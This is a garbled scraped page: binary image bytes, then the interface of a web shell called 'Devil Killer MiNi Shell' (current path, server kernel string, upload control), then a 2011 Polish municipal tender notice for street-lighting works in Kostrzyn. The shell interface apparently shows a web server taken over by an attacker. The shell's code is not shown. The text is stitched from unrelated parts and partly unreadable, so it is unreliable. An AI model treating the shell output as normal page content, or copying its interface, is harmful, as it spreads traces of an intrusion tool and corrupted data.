JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20111006/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20111006/263623-N-2011.html

<p class="kh_header"><b>Kostrzyn: BUDOWA I ROZBUDOWA OŚWIETLENIA NA TERENIE MIASTA I GMINY KOSTRZYN</b><br>
<b>Numer ogłoszenia: 263623 - 2011; data zamieszczenia: 06.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Gminy Kostrzyn Urząd Miejski w Kostrzynie , ul. Dworcowa 5, 62-025 Kostrzyn, woj. wielkopolskie, tel. 61 8178565, faks 61 8178191.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kostrzyn.wlkp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BUDOWA I ROZBUDOWA OŚWIETLENIA NA TERENIE MIASTA I GMINY KOSTRZYN.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: budowa i rozbudowa oświetlenia na Osiedlu Kórnickim, Grunwaldzkim (obwód II) i Wrzesińskim (etap I) w Kostrzynie oraz w miejscowościach Iwo, Wiktorowo i Siekierki Wielkie (obwód IV), gm. Kostrzyn.

UWAGI:

1)	Wszystkie nazwy producentów materiałów, urządzeń itp. użyte przypadkowo w dokumentacji projektowej, w przedmiarach robót oraz innych dokumentach należy traktować wyłącznie jako informacje pomocnicze. Możliwe jest stosowanie równoważnych produktów innych producentów spełniających kryteria i wymogi określone za pomocą parametrów technicznych w dokumentacji projektowej.
2)	W przypadku zaistnienia konieczności (w trakcie trwania realizacji robót)  zastosowania robót lub materiałów zamiennych i dodatkowych,  w sytuacjach uzasadnionych w protokole konieczności (na wniosek Zamawiającego lub Wykonawcy) i za obustronną zgodą, wycena może być dokonana wyłącznie na podstawie cen i stawek określonych w ofercie, a w przypadku ich braku w oparciu o analizę i wycenę własną  z zachowaniem stawek określonych w ofercie przy uwzględnieniu cen zawartych w powszechnie stosowanych katalogach cen materiałów i prac budowlanych jeżeli określone stawki nie zostały wskazane w ofercie (zamawiający dopuszcza możliwość zastosowania rabatu).
3)	Zamawiający nie przewiduje przeprowadzenia aukcji elektronicznej.
4)	Zamawiający nie przewiduje zawarcia umowy ramowej.
5)	Zamawiający nie przewiduje możliwości udzielania Wykonawcy realizującemu zamówienie, zaliczek na poczet wykonania zamówienia.
6)	Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów.
Wymagane terminy realizacji zamówienia : 
1.	Rozpoczęcie robót  gotowość do świadczenia robót na dwa dni od daty zawarcia umowy.
2.	Zakończenie  robót 05.12.2011 r. (jednak nie mniej niż 30 dni licząc od dnia wyznaczonego na zawarcie umowy).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje do każdego zadania możliwość udzielania zamówień uzupełniających o łącznej wartości do 50% wartości zamówienia podstawowego. Zamówienia uzupełniające to zamówienia polegające wyłącznie na powtórzeniu tego samego rodzaju robót, które objęte były zamówieniem podstawowym.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.14.00-9, 45.31.61.10-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 05.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena odbywać się będzie na zasadzie spełnia - nie spełnia  w oparciu o wymagane przez Zamawiającego i złożone przez Wykonawcę dokumenty.
Zamawaiący wymaga, aby Wykonawca w okresie ostatnich pięciu lat przed dniem wszczęcia  postępowania o udzielenie zamówienia,  a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, wykonał z należytą starannością co najmniej jedno zamówienie dotyczące budowy lub rozbudowy oświetlenia ulicznego (drogowego) wraz z ułożeniem linii kablowej nn 0,4kV ze słupami oświetleniowym w zakresie zgodnym lub szerszym od zakresu przedmiotowego zamówienia określonego w pkt. III SIWZ, oraz dysponował odpowiednimi dokumentami potwierdzającymi, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena odbywać się będzie na zasadzie spełnia - nie spełnia  w oparciu o wymagane przez Zamawiającego i złożone przez Wykonawcę dokumenty.
Zamawaiący wymaga, aby Wykonawca dsponował:
a) podnośnikiem koszowym  samojezdnym o wysięgu min. 12,00 m, posiadającym ważne ubezpieczenie OC oraz ważny przegląd techniczny,
b) Koparko - ładowarką lub mini koparką, posiadającym ważne ubezpieczenie OC,
c) innym niezbędnym sprzętem i wyposażeniem gwarantującym kompleksowe i rzetelne wykonanie przedmiotu zamówienia,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena odbywać się będzie na zasadzie spełnia - nie spełnia  w oparciu o wymagane przez Zamawiającego i złożone przez Wykonawcę dokumenty.
Zamawaiący wymaga, aby Wykonawca dsponował:
a) odpowiednią liczbą pracowników fachowców, gwarantującą terminowe i profesjonalne wykonanie zamówienia,
b) min. 2 pracowników musi posiadać aktualne świadectwo kwalifikacyjne E uprawniające do zajmowania się  eksploatacją urządzeń, instalacji i sieci o napięciu znamionowym do 1 kV,
c) min. 1 osoba wyznaczona na kierownika robót musi posiadać uprawnienia do pełnienia samodzielnych funkcji w budownictwie w zakresie kierowania robotami budowlanymi bez  ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych i musi należeć  do właściwej izby inżynierów budownictwa, a w przypadku osób zagranicznych, musi posiadać inne  zamienne uprawnienia zaakceptowane przez nadzór budowlany Starostwa Powiatowego w Poznaniu lub zaświadczenia wydane przez Ministra Infrastruktury potwierdzające, że  dana osoba na podstawie tego zaświadczenia może kierować na terenie Polski budową lub robotami, budowlanymi w danej specjalności.
d) min. 1 osoba - operator musi posiadać uprawnienia do obsługi  podnośnika koszowego,
e) min. 1 osoba  - operator musi posiadać uprawnienia do obsługi koparko - ładowarki lub  mini koparki.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena odbywać się będzie na zasadzie spełnia - nie spełnia  w oparciu o wymagane przez Zamawiającego i złożone przez Wykonawcę dokumenty.
Zamawaiący wymaga, aby Wykonawca dsponował środkami finansowymi przeznaczonymi na realizację zamówienia w odpowiedniej wysokości,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie, że Wykonawca zapoznał się z treścią specyfikacji istotnych warunków zamówienia do postępowania na BUDOWA I ROZBUDOWA OŚWIETLENIA NA TERENIE MIASTA I GMINY KOSTRZYN - zadanie nr    i że oferowane przez niego roboty, dostawy i usługi odpowiadają wymaganiom określonym przez Zamawiającego oraz, że na wykonane zamówienie udzieli gwarancji na okres min. 36 miesięcy licząc od daty protokołu odbioru końcowego robót. 
2. Oświadczenie, że: 
1) kierownik budowy oraz pozostałe osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane przepisami prawa uprawnienia i kwalifikacje uprawnienia, tj.:
a) aktualne świadectwo kwalifikacyjne E uprawniające do zajmowania się  eksploatacją urządzeń, instalacji i sieci o napięciu znamionowym do 1 kV   (min. 2 pracowników),
b) aktualne uprawnienia do pełnienia samodzielnych funkcji w budownictwie w zakresie kierowania robotami budowlanymi bez z ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych i zaświadczenie o przynależności  do właściwej izby inżynierów budownictwa - min. 1 osoby, a w przypadku osób zagranicznych, inne zamienne dokumenty zaakceptowane przez nadzór budowlany Starostwa Powiatowego w Poznaniu lub zaświadczenia wydane przez Ministra Infrastruktury potwierdzające, że uprawniają one daną osobę i że są wystarczające do kierowania na terenie Polski budową lub robotami, budowlanymi w danej specjalności
c) aktualne uprawnienia (min. 1 osoba) operatora  do obsługi podnośnika koszowego
d) aktualne uprawnienia (min. 1 osoba) operatora  do obsługi koparko - ładowarki  lub mini koparki
oraz. że dysponuje odpowiednią liczbą fachowców, gwarantującą terminowe i profesjonalne wykonanie zamówienia,
2) Wykonawca dysponuje:
a) podnośnikiem koszowym  samojezdnym o wysięgu min. 12,00 m, posiadającym ważne ubezpieczenie OC oraz ważny przegląd techniczny 
b) Koparko - ładowarką lub mini koparką, posiadającą ważne ubezpieczenie OC 
c) innym niezbędnym sprzętem i wyposażeniem gwarantującym kompleksowe i rzetelne wykonanie przedmiotu zamówienia odpowiednim sprzętem i wyposażeniem gwarantującym kompleksowe i rzetelne wykonanie przedmiotu zamówienia,
3) Wykonawca dysponuje odpowiednią kwotą przeznaczoną na realizację przedmiotowego zamówienia. 
4) Wykonawca zobowiązuje się (na czas realizacji zamówienia) do ubezpieczenia budowy od szkód, zdarzeń losowych oraz od odpowiedzialności cywilnej za szkody wyrządzone osobom trzecim na kwotę min.: 60 000,00 zł. (niezależnie od ilości zadań, na które zostaną zawarte osobne umowy) oraz do utrzymywania wyżej wymienionego poziomu ubezpieczenia od odpowiedzialności cywilnej do dnia końcowego odbioru robót.
5) Wykonawca najpóźniej w dniu przekazania placu budowy przedłoży Zamawiającemu kserokopię polisy ubezpieczeniowej, o której mowa wyżej.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień umowy w oparciu o  art.144 ust. 1 może dotyczyć:
1) terminu zakończenia robót
a) w przypadku wstrzymania lub przerwania robót, znajdujące potwierdzenie odpowiednim wpisem do dziennika budowy, Protokołem Konieczności lub innym dokumentem,  wskutek:
A. wystąpienia niekorzystnych warunków atmosferycznych, gruntowych lub innych nieprzewidzianych zdarzeń losowych (m.in. uniemożliwiających dalsze prowadzenie robót budowlanych), 
B. zawieszenia robót przez Zamawiającego, 
C. wystąpienia wykopalisk, awarii lub nieprzewidzianych kolizji uniemożliwiających wykonywanie robót, 
D. zmian w dokumentacji projektowej, dokonanych na wniosek Zamawiającego lub Wykonawcy, 
E. siły wyższej, itp.,
W takich przypadkach, dopuszcza się zmianę terminu zakończenia robót o czas uzasadnionej przerwy w robotach, o czas niezbędny do przywrócenia realizowanego przedmiotu zamówienia do stanu przed wstrzymaniem robót, o czas potrzebny na uzyskanie zgody lub niezbędnych pozwoleń, na wprowadzenie koniecznych zmian lub inne okoliczności, poparte odpowiednimi dokumentami, wyłącznie za zgodą obu stron (w formie pisemnego aneksu).
b) wystąpienia  nieprzewidzianych robót dodatkowych, 
2) nieprzewidzianych okoliczności formalno-prawnych,
3) korekty oczywistych omyłek i błędów pisarskich oraz stylistyki,
4) warunków płatności, na pisemny wniosek Wykonawcy i za zgodą Zamawiającego,
5) zmian osobowych:  kierowników budowy, robót, osób upoważnionych - tylko w uzgodnieniu i po otrzymaniu akceptacji Zamawiającego.
6) zmiany zakresu rzeczowego i ilościowego robót. Zmiana taka może mieć miejsce tylko w uzasadnionych przypadkach i dotyczyć może tych robót, których nie przewidziała dokumentacja projektowa - robót niezbędnych lub zamiennych, których konieczność wykonania pojawiła się na etapie realizacji zamówienia. Zmiana zakresu rzeczowego i ilościowego robót nastąpi tylko i wyłącznie w wyniku porozumienia obu stron umowy i zatwierdzenia ich przez inspektora nadzoru lub projektanta. W takim przypadku wycena może być dokonana wyłącznie na podstawie cen i stawek określonych w ofercie, a w przypadku ich braku, w oparciu o analizę i wycenę własną z zachowaniem stawek określonych w ofercie i przy uwzględnieniu cen zawartych w powszechnie stosowanych katalogach cen materiałów i prac budowlanych, jeżeli określone stawki nie zostały wskazane w ofercie (Zamawiający dopuszcza możliwość zastosowania rabatu).
7)	Zmiany wysokości wynagrodzenia (brutto) wynikającej z ustawowej zmiany stawki podatku VAT.
Każda z wyżej wymienionych zmian umowy może być dokonana wyłącznie za zgodą Zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kostrzyn.wlkp.pl (bip, Przetargi Urząd Miejski, Specyfikacja SIWZ zmiany i odpowiedzi, 2011)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> URZĄD MIEJSKI w Kostrzynie, 62-025 KOSTRZYN, ul. Dworcowa 5, pok. 31 - II p. (cena 50,0 zł + koszty przesyłki).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.10.2011 godzina 09:00, miejsce: URZĄD MIEJSKI w Kostrzynie, 62-025 KOSTRZYN, ul. Dworcowa 5, pok. 01 - sekretariat I p.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1 - Budowa oświetlenia na drodze Iwno - Wiktorowo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1 - Budowa oświetlenia na drodze Iwno - Wiktorowo. Realizacja zadania polegać będzie na budowie linii kablowej nn 0,4kV wraz ze słupami oświetleniowymi w miejscowości Iwno, ul. Leśna aż do m. Wiktorowo. Projektowane oprawy oświetleniowe zasilane będą z istniejącej stacji transformatorowej nr 06 - 390 obwód II, w której znajduje się transformator o mocy 160kVA. Z istniejącego słupa linii napowietrznej nn 0,4kV nr II/9 należy zasilić projektowaną szafkę oświetlenia ulicznego. Zgodnie z planem sytuacyjnym ustawić słupy oświetleniowe stalowe typu SO 8/No c wraz z wysięgnikiem W12 w ilości 13kpl; zastosować fundament stabilizujący. Na słupach zamontować oprawy oświetlenia ulicznego typu SGS 101/70 ze źródłem światła 70W.
Wykonawca robót zobowiązany jest dokonać wszelkich wymaganych odbiorów technicznych w Enea Operator zakończonych protokołem odbioru i przedstawieniem go Inwestorowi. Wykonawca zobowiązany jest również do załatwienia wszelkich spraw związanych z podpisaniem przez Inwestora tj. Gminę Kostrzyn umowy o przyłączenie do sieci oraz umowy o dostarczenie energii elektrycznej z wskazanym przez Inwestora dostawcą energii celem założenia licznika energii elektrycznej.

Do zakresu zamówienia należy również:
- obsługa geodezyjna budowy,
- dokumentacja geodezyjna powykonawcza - 5 egz.
Szczegółowy zakres robót został określony w :
- projekcie budowlanym pod tytułem  Budowa oświetlenia ulicznego w miejscowości Iwno - Wiktorowo ul. Leśna, DZ. NR 47, 54/1, opracowanym w grudniu 2010 r. przez FIRMĘ ENTRA - Przemysław Mroczek, ul. Andrzejewo 17, 62-025 KOSTRZYN,

-  specyfikacji technicznej wykonania i odbioru robót (zał. Nr  4 - do SIWZ - zad. 1), opracowanej  we wrześniu  2011 r. przez FIRMĘ ENTRA - Przemysław Mroczek, ul. Andrzejewo 17, 62-025 KOSTRZYN ,

- przedmiarze robót  i kosztorysie ofertowym (zał. Nr 5 do SIWZ - zad.1 ), opracowanych w dniu 18.07.2011 r. przez FIRMĘ ENTRA - Przemysław Mroczek, ul. Andrzejewo 17, 62-025 KOSTRZYN..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.14.00-9, 45.31.61.10-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 05.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2 - Budowa oświetlenia osiedla Wrzesińskiego I Etap.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 2 - Budowa oświetlenia osiedla Wrzesińskiego I Etap. Realizacja zadania polegać będzie na budowie linii kablowej nn 0,4kV wraz ze słupami oświetleniowymi w miejscowości Kostrzyn os. Wrzesińskie. Oprawy oświetleniowe zasilane będą z istniejącej stacji transformatorowej nr 06 - 1386 obwód VIII, w której znajduje się transformator o mocy 160kVA. Z  rozdzielni nn 0,4KV pola nr 8 stacji transformatorowej należy zasilić szafkę oświetlenia ulicznego. Słupy oświetleniowe stalowe typu SO 8/No  wraz z wysięgnikiem W12 w ilości 28kpl; zastosować fundament stabilizujący. na słupach zamontować oprawy oświetlenia ulicznego typu SGS 101/70 ze źródłem światła 70W, 
